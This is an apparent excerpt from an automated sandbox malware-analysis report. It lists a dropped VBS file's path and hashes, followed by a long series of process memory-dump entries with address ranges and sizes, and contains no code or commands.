C:\Users\Admin\AppData\Roaming\beautifulldaykiss.vbs

Filesize
3KB

MD5
abf0fe94801f2af6c35f70e5f5a05c0e

SHA1
856ce1fa8938605c153e91f75233e1ae060fdae2

SHA256
8bba1d1c67887d33bffbe2c4ed46226af284c75db270d1c484b714c368909b40

SHA512
a51fd44f84438c35494977073d61f4502ca1b179b794f84c2b458f0042c455cd974c487af33ef36cb1880cfee9bede57f74325dc5826087646e7bafc0bd4ae49

Download Submit
memory/576-126-0x000000006A680000-0x000000006AC2B000-memory.dmp

Filesize
5.7MB

Download
memory/576-121-0x000000006A680000-0x000000006AC2B000-memory.dmp

Filesize
5.7MB

Download
memory/576-165-0x000000006A680000-0x000000006AC2B000-memory.dmp

Filesize
5.7MB

Download
memory/576-125-0x000000006A680000-0x000000006AC2B000-memory.dmp

Filesize
5.7MB

Download
memory/576-122-0x0000000002960000-0x00000000029A0000-memory.dmp

Filesize
256KB

Download
memory/1584-134-0x0000000002A00000-0x0000000002A40000-memory.dmp

Filesize
256KB

Download
memory/1584-46-0x000000006A680000-0x000000006AC2B000-memory.dmp

Filesize
5.7MB

Download
memory/1584-135-0x0000000002A00000-0x0000000002A40000-memory.dmp

Filesize
256KB

Download
memory/1584-136-0x0000000002A00000-0x0000000002A40000-memory.dmp

Filesize
256KB

Download
memory/1584-133-0x000000006A680000-0x000000006AC2B000-memory.dmp

Filesize
5.7MB

Download
memory/1584-44-0x000000006A680000-0x000000006AC2B000-memory.dmp

Filesize
5.7MB

Download
memory/1584-47-0x0000000002A00000-0x0000000002A40000-memory.dmp

Filesize
256KB

Download
memory/1584-45-0x0000000002A00000-0x0000000002A40000-memory.dmp

Filesize
256KB

Download
memory/1584-152-0x000000006A680000-0x000000006AC2B000-memory.dmp

Filesize
5.7MB

Download
memory/1592-180-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1592-170-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1592-177-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1592-179-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1592-182-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1592-202-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1592-173-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/1688-151-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-162-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-137-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-139-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-141-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-149-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-147-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1688-146-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-145-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-144-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-143-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-142-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-233-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-196-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-154-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-155-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-156-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-204-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1688-158-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-160-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-159-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-208-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1688-161-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-164-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-207-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1688-166-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-167-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-214-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-213-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1688-209-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1688-212-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1688-211-0x0000000000400000-0x0000000000482000-memory.dmp

Filesize
520KB

Download
memory/1716-185-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1716-181-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1716-188-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1716-210-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1716-189-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/1716-175-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2360-127-0x00000000711DD000-0x00000000711E8000-memory.dmp

Filesize
44KB

Download
memory/2360-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2360-2-0x00000000711DD000-0x00000000711E8000-memory.dmp

Filesize
44KB

Download
memory/2360-232-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2360-0-0x000000002FD01000-0x000000002FD02000-memory.dmp

Filesize
4KB

Download
memory/2584-195-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2584-193-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2584-187-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2584-194-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2584-197-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2584-191-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2788-36-0x0000000002B20000-0x0000000002B60000-memory.dmp

Filesize
256KB

Download
memory/2788-132-0x0000000002B20000-0x0000000002B60000-memory.dmp

Filesize
256KB

Download
memory/2788-35-0x000000006A680000-0x000000006AC2B000-memory.dmp

Filesize
5.7MB

Download
memory/2788-37-0x000000006A680000-0x000000006AC2B000-memory.dmp

Filesize
5.7MB

Download
memory/2788-38-0x0000000002B20000-0x0000000002B60000-memory.dmp

Filesize
256KB

Download
memory/2788-128-0x000000006A680000-0x000000006AC2B000-memory.dmp

Filesize
5.7MB

Download
memory/2788-131-0x0000000002B20000-0x0000000002B60000-memory.dmp

Filesize
256KB

Download
memory/2788-130-0x000000006A680000-0x000000006AC2B000-memory.dmp

Filesize
5.7MB

Download
memory/2788-157-0x000000006A680000-0x000000006AC2B000-memory.dmp

Filesize
5.7MB

Download
memory/2788-129-0x0000000002B20000-0x0000000002B60000-memory.dmp

Filesize
256KB

Download